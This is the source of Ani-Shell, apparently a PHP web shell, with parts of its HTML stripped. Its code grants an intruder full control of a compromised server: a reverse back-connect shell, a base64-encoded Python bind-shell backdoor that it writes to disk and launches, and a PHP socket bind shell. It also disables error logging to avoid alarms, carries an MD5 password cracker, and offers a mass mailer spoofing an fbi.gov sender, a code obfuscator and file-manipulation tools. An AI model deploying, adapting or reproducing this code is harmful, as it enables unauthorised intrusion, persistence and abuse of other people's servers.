>>>>>>>> c0d3d by lionaneesh <<<<<<<<<< []======================================== []+ Email: lionaneesh@gmail.com + []+ Twitter : twitter.com/lionaneesh + []======================================== [] [] [] [] [] [] [] [] [] [] C0de For India [] Hack For India [] Live for India [] [] Jai Hind */ ini_set('max_execution_time',0); ini_set('memory_limit','999999999M'); function Zip($source, $destination) // Thanks to Alix Axel { if (!extension_loaded('zip') || !file_exists($source)) { return false; } $zip = new ZipArchive(); if (!$zip->open($destination, ZIPARCHIVE::CREATE)) { return false; } $source = str_replace('\\', '/', realpath($source)); if (is_dir($source) === true) { $files = new RecursiveIteratorIterator(new RecursiveDirectoryIterator($source), RecursiveIteratorIterator::SELF_FIRST); foreach ($files as $file) { $file = str_replace('\\', '/', realpath($file)); if (is_dir($file) === true) { $zip->addEmptyDir(str_replace($source . '/', '', $file . '/')); } else if (is_file($file) === true) { $zip->addFromString(str_replace($source . '/', '', $file), file_get_contents($file)); } } } else if (is_file($source) === true) { $zip->addFromString(basename($source), file_get_contents($source)); } return $zip->close(); } if(isset($_GET['zip'])) { $src = $_GET['zip']; $dst = getcwd()."/".basename($_GET['zip']).".zip"; if (Zip($src, $dst) != false) { $filez = file_get_contents($dst); header("Content-type: application/octet-stream"); header("Content-length: ".strlen($filez)); header("Content-disposition: attachment; filename=\"".basename($dst)."\";"); echo $filez; } exit; } // ------------------------------------- Some header Functions (Need to be on top) ---------------------------------\ /**************** Defines *********************************/ $greeting = "0x xx W3lc0m3 M4st3r xx x0"; $user = "lionaneesh"; $pass = "lionaneesh"; $lock = "on"; // set this to off if you dont need the login page $antiCrawler = "off"; // set this to on if u dont want your shell to be publicised in Search Engines ! (It increases the shell's Life') $tracebackFeature = "off"; // set this feature to on to enable email alerts $ownerEmail = "lionaneesh@gmail.com"; // Change this to your email , This email is used to deliver tracebacks about your shell $url = (!empty($_SERVER['HTTPS'])) ? "https://".$_SERVER['SERVER_NAME'].$_SERVER['REQUEST_URI'] : "http://".$_SERVER['SERVER_NAME'].$_SERVER['REQUEST_URI']; $phpVersion = phpversion(); $self = $_SERVER["PHP_SELF"]; // Where am i $sm = @ini_get('safe_mode'); $SEPARATOR = '/'; // Default Directory separator $os = "N/D"; if(stristr(php_uname(),"Windows")) { $SEPARATOR = '\\'; $os = "Windows"; } else if(stristr(php_uname(),"Linux")) { $os = "Linux"; } //*************************************************************/ // -------------- Traceback Functions function sendLoginAlert() { global $ownerEmail; global $url; $accesedIp = $_SERVER['REMOTE_ADDR']; $randomInt = rand(0,1000000); # to avoid id blocking $from = "ani-shell$randomInt@fbi.gov"; //echo $from; if(function_exists('mail')) { $subject = "Shell Accessed -- Ani-Shell --"; $message = " Hey Owner , Your Shell(Ani-Shell) located at $url was accessed by $accesedIp If its not you :- 1. Please check if the shell is secured. 2. Change your user name and Password. 3. Check if lock is 0n! Thanking You Yours Faithfully Ani-Shell "; mail($ownerEmail,$subject,$message,'From:'.$from); } } //--------------------------------------------------------- if(function_exists('session_start') && $lock == 'on') { session_start(); } else { // The lock will be set to 'off' if the session_start fuction is disabled i.e if sessions are not supported $lock = 'off'; } //logout if(isset($_GET['logout']) && $lock == 'on') { $_SESSION['authenticated'] = 0; session_destroy(); header("location: ".$_SERVER['PHP_SELF']); } ini_set('max_execution_time',0); /***************** Restoring *******************************/ ini_restore("safe_mode_include_dir"); ini_restore("safe_mode_exec_dir"); ini_restore("disable_functions"); ini_restore("allow_url_fopen"); ini_restore("safe_mode"); ini_restore("open_basedir"); if(function_exists('ini_set')) { ini_set('error_log',NULL); // No alarming logs ini_set('log_errors',0); // No logging of errors ini_set('file_uploads',1); // Enable file uploads ini_set('allow_url_fopen',1); // allow url fopen } else { ini_alter('error_log',NULL); ini_alter('log_errors',0); ini_alter('file_uploads',1); ini_alter('allow_url_fopen',1); } // ---------------------------------------------------------------------------------------------------------------- ?>
Lock is Switched Off! , The shell can be accessed by anyone!
[]======================================== []--------------Ani Shell----------------- []---------------------------------------- []======================================== []>>>>>>>>> c0d3d by lionaneesh <<<<<<<<<< []======================================== [] Email: lionaneesh@gmail.com + [] Twitter : twitter.com/lionaneesh + []======================================== [] [] [] [] [] [] [] [] [] [] C0de For India [] Hack For India [] Live for India [] [] |
// include("http://ani-shell.sourceforge.net/wassup.txt");
Hash or List invalid!
"; } else { while (! feof( $fd )) { if( ($pwdList = fgets( $fd, 1024 )) == FALSE) { break; } $pwdList = trim($pwdList); if(md5($pwdList) == $hash ) { return "\nPlanintext : $pwdList
"; } } } } function exec_query_mysql($query,$sql_server,$sql_port,$sql_db,$sql_user,$sql_pass) { $link = mysql_connect($sql_server.":".$port,$sql_user,$sql_pass); if(!$link) { return 'Could not connect: ' . mysql_error(); } $resource = mysql_query($query); if(!$resource) return(mysql_error()); } //------------------------------------------------------------------------------------------------ ?>
Your IP : | Server IP : Safe Mode : |
You are ".trim(exec_all("whoami"))."
"; } else { echo "Rooting Failed
"; } } } else { echo "Permission Denied
"; } ?> File uploaded to $uploadPath"; } else { echo "Failed to upload file to $uploadPath
"; } } } else { ?>Upload (From ur Computer) |
Note : Any one of the following options is compulsory to be filled rest can be left blank.
Fatal : An unexpected error was occured when trying to connect!
"; } else { fputs ($sockfd ,"\n=================================================================\nAni-Shell | C0d3d by lionaneesh | India\n================================================================="); $pwd = exec_all("pwd"); $sysinfo = exec_all("uname -a"); $id = exec_all("id"); $dateAndTime = exec_all("time /t & date /T"); $len = 1337; fputs($sockfd ,$sysinfo . "\n" ); fputs($sockfd ,$pwd . "\n" ); fputs($sockfd ,$id ."\n\n" ); fputs($sockfd ,$dateAndTime."\n\n" ); while(!feof($sockfd)) { $cmdPrompt ="(Ani-Shell)[$]> "; fputs ($sockfd , $cmdPrompt ); $command= fgets($sockfd, $len); fputs($sockfd , "\n" . exec_all($command) . "\n\n"); } fclose($sockfd); } } else if( isset($_POST['port']) && isset($_POST['passwd']) && $_POST['port'] != "" && $_POST['passwd'] != "" && isset($_POST['mode'])) { $address = ''; $port = $_POST['port']; $pass = $_POST['passwd']; if($_POST['mode'] == "Python") { $Python_CODE = "IyBTZXJ2ZXIgIA0KIA0KaW1wb3J0IHN5cyAgDQppbXBvcnQgc29ja2V0ICANCmltcG9ydCBvcyAgDQoNCmhvc3QgPSAnJzsgIA0KU0laRSA9IDUxMjsgIA0KDQp0cnkgOiAgDQogICAgIHBvcnQgPSBzeXMuYXJndlsxXTsgIA0KDQpleGNlcHQgOiAgDQogICAgIHBvcnQgPSAzMTMzNzsgIA0KIA0KdHJ5IDogIA0KICAgICBzb2NrZmQgPSBzb2NrZXQuc29ja2V0KHNvY2tldC5BRl9JTkVUICwgc29ja2V0LlNPQ0tfU1RSRUFNKTsgIA0KDQpleGNlcHQgc29ja2V0LmVycm9yICwgZSA6ICANCg0KICAgICBwcmludCAiRXJyb3IgaW4gY3JlYXRpbmcgc29ja2V0IDogIixlIDsgIA0KICAgICBzeXMuZXhpdCgxKTsgICANCg0Kc29ja2ZkLnNldHNvY2tvcHQoc29ja2V0LlNPTF9TT0NLRVQgLCBzb2NrZXQuU09fUkVVU0VBRERSICwgMSk7ICANCg0KdHJ5IDogIA0KICAgICBzb2NrZmQuYmluZCgoaG9zdCxwb3J0KSk7ICANCg0KZXhjZXB0IHNvY2tldC5lcnJvciAsIGUgOiAgICAgICAgDQogICAgIHByaW50ICJFcnJvciBpbiBCaW5kaW5nIDogIixlOyANCiAgICAgc3lzLmV4aXQoMSk7ICANCiANCnByaW50KCJcblxuPT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09Iik7IA0KcHJpbnQoIi0tLS0tLS0tIFNlcnZlciBMaXN0ZW5pbmcgb24gUG9ydCAlZCAtLS0tLS0tLS0tLS0tLSIgJSBwb3J0KTsgIA0KcHJpbnQoIj09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PVxuXG4iKTsgDQogDQp0cnkgOiAgDQogICAgIHdoaWxlIDEgOiAjIGxpc3RlbiBmb3IgY29ubmVjdGlvbnMgIA0KICAgICAgICAgc29ja2ZkLmxpc3RlbigxKTsgIA0KICAgICAgICAgY2xpZW50c29jayAsIGNsaWVudGFkZHIgPSBzb2NrZmQuYWNjZXB0KCk7ICANCiAgICAgICAgIHByaW50KCJcblxuR290IENvbm5lY3Rpb24gZnJvbSAiICsgc3RyKGNsaWVudGFkZHIpKTsgIA0KICAgICAgICAgd2hpbGUgMSA6ICANCiAgICAgICAgICAgICB0cnkgOiAgDQogICAgICAgICAgICAgICAgIGNtZCA9IGNsaWVudHNvY2sucmVjdihTSVpFKTsgIA0KICAgICAgICAgICAgIGV4Y2VwdCA6ICANCiAgICAgICAgICAgICAgICAgYnJlYWs7ICANCiAgICAgICAgICAgICBwaXBlID0gb3MucG9wZW4oY21kKTsgIA0KICAgICAgICAgICAgIHJhd091dHB1dCA9IHBpcGUucmVhZGxpbmVzKCk7ICANCiANCiAgICAgICAgICAgICBwcmludChjbWQpOyAgDQogICAgICAgICAgIA0KICAgICAgICAgICAgIGlmIGNtZCA9PSAnZzJnJzogIyBjbG9zZSB0aGUgY29ubmVjdGlvbiBhbmQgbW92ZSBvbiBmb3Igb3RoZXJzICANCiAgICAgICAgICAgICAgICAgcHJpbnQoIlxuLS0tLS0tLS0tLS1Db25uZWN0aW9uIENsb3NlZC0tLS0tLS0tLS0tLS0tLS0iKTsgIA0KICAgICAgICAgICAgICAgICBjbGllbnRzb2NrLnNodXRkb3duKCk7ICANCiAgICAgICAgICAgICAgICAgYnJlYWs7ICANCiAgICAgICAgICAgICB0cnkgOiAgDQogICAgICAgICAgICAgICAgIG91dHB1dCA9ICIiOyAgDQogICAgICAgICAgICAgICAgICMgUGFyc2UgdGhlIG91dHB1dCBmcm9tIGxpc3QgdG8gc3RyaW5nICANCiAgICAgICAgICAgICAgICAgZm9yIGRhdGEgaW4gcmF3T3V0cHV0IDogIA0KICAgICAgICAgICAgICAgICAgICAgIG91dHB1dCA9IG91dHB1dCtkYXRhOyAgDQogICAgICAgICAgICAgICAgICAgDQogICAgICAgICAgICAgICAgIGNsaWVudHNvY2suc2VuZCgiQ29tbWFuZCBPdXRwdXQgOi0gXG4iK291dHB1dCsiXHJcbiIpOyAgDQogICAgICAgICAgICAgICANCiAgICAgICAgICAgICBleGNlcHQgc29ja2V0LmVycm9yICwgZSA6ICANCiAgICAgICAgICAgICAgICAgICANCiAgICAgICAgICAgICAgICAgcHJpbnQoIlxuLS0tLS0tLS0tLS1Db25uZWN0aW9uIENsb3NlZC0tLS0tLS0tIik7ICANCiAgICAgICAgICAgICAgICAgY2xpZW50c29jay5jbG9zZSgpOyAgDQogICAgICAgICAgICAgICAgIGJyZWFrOyAgDQpleGNlcHQgIEtleWJvYXJkSW50ZXJydXB0IDogIA0KIA0KDQogICAgIHByaW50KCJcblxuPj4+PiBTZXJ2ZXIgVGVybWluYXRlZCA8PDw8PFxuIik7ICANCiAgICAgcHJpbnQoIj09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09Iik7IA0KICAgICBwcmludCgiXHRUaGFua3MgZm9yIHVzaW5nIEFuaS1zaGVsbCdzIC0tIFNpbXBsZSAtLS0gQ01EIik7ICANCiAgICAgcHJpbnQoIlx0RW1haWwgOiBsaW9uYW5lZXNoQGdtYWlsLmNvbSIpOyAgDQogICAgIHByaW50KCI9PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT0iKTsNCg=="; $fd = fopen("bind.py","w"); if($fd != FALSE) { fwrite($fd,base64_decode($Python_CODE)); if($os == "Linux") { echo "[+] OS Detected = Windows"; exec_all("chmod +x bind.py ; ./bind.py"); // CHeck if the process is running $pattern = "bind.py"; $list = exec_all("ps -aux"); } else { echo "[+] OS Detected = Windows"; exec_all("start bind.py"); // CHeck if the process is running $pattern = "python.exe"; $list = exec_all("TASKLIST"); } if(preg_match("/$pattern/",$list)) { echo "Process Found Running! Backdoor Setuped Successfully! :D
"; } else { echo "Process Not Found Running! Backdoor Setup FAILED :(
"; } echo "\n$list"; } } } else if($_POST['mode'] == "PHP") { // Set time limit to indefinite execution set_time_limit (0); // Set the ip and port we will listen on if(function_exists("socket_create")) { // Create a TCP Stream socket $sockfd = socket_create(AF_INET, SOCK_STREAM, SOL_TCP); // Bind the socket to an address/port if(socket_bind($sockfd, $address, $port) == FALSE) { echo "Cant Bind to the specified port and address!"; } // Start listening for connections socket_listen($sockfd,15); $passwordPrompt = "\n=================================================================\nAni-Shell | C0d3d by lionaneesh | India\n=================================================================\n\n0xPassword : "; /* Accept incoming requests and handle them as child processes */ $client = socket_accept($sockfd); socket_write($client , $passwordPrompt); // Read the pass from the client $input = socket_read($client, strlen($pass) + 2); // +2 for \r\n if(trim($input) == $pass) { socket_write($client , "\n\n"); socket_write($client , ($os == "Windows") ? exec_all("date /t & time /t") . "\n" . exec_all("ver") : exec_all("date") . "\n" . exec_all("uname -a")); socket_write($client , "\n\n"); while(1) { // Print Command prompt $commandPrompt ="(Ani-Shell)[$]> "; $maxCmdLen = 31337; socket_write($client,$commandPrompt); $cmd = socket_read($client,$maxCmdLen); if($cmd == FALSE) { echo "The client Closed the conection!"; break; } socket_write($client , exec_all($cmd)); } } else { echo "Wrong Password!"; socket_write($client, "sU(|< - 0FF Bitch!\n\n"); } socket_shutdown($client, 2); socket_close($socket); // Close the client (child) socket //socket_close($client); // Close the master sockets //socket_close($sock); } else { echo "Socket Conections not Allowed/Supported by the server!
Back Connect | Bind Shell |
Note : After clicking Submit button , The browser will start loading continuously , Dont close this window , Unless you are done!
"; print "I am at ma Work now :D ;D! Dont close this window untill you recieve a messageMail(s) Sent!
"; } } else { ?> Mail Sent!"; } else { echo "Some Error Occured!
"; } } else { ?> Permission Denied"; else { fwrite($handle,$_POST['content']); echo "Your changes were Successfully Saved!"; } } else { echo "File Name Specified does not exists!
"; } } // PHP Obfuscator else if(isset($_GET['obfuscate'])) { if ( isset($_POST['code']) && $_POST['code'] != '') { $encoded = base64_encode(gzdeflate(trim(stripslashes($_POST['code'].' '),''),9)); // high Compression! :P $encode = ' '; } else { $encode = 'Please Enter your Code! and Click Submit! :)'; }?>Cant rename the file specified! Please check the file-name , Permissions and try again!
File Renamed , Return Here
"; $dir = getcwd(); if(isset($_GET['dir'])) { $dir = $_GET['dir']; } ?>Name | Size | Permissions | Delete | Rename | Zip |
/ | Delete | Rename | Download (zip) | ||
Delete | Rename | Download (zip) |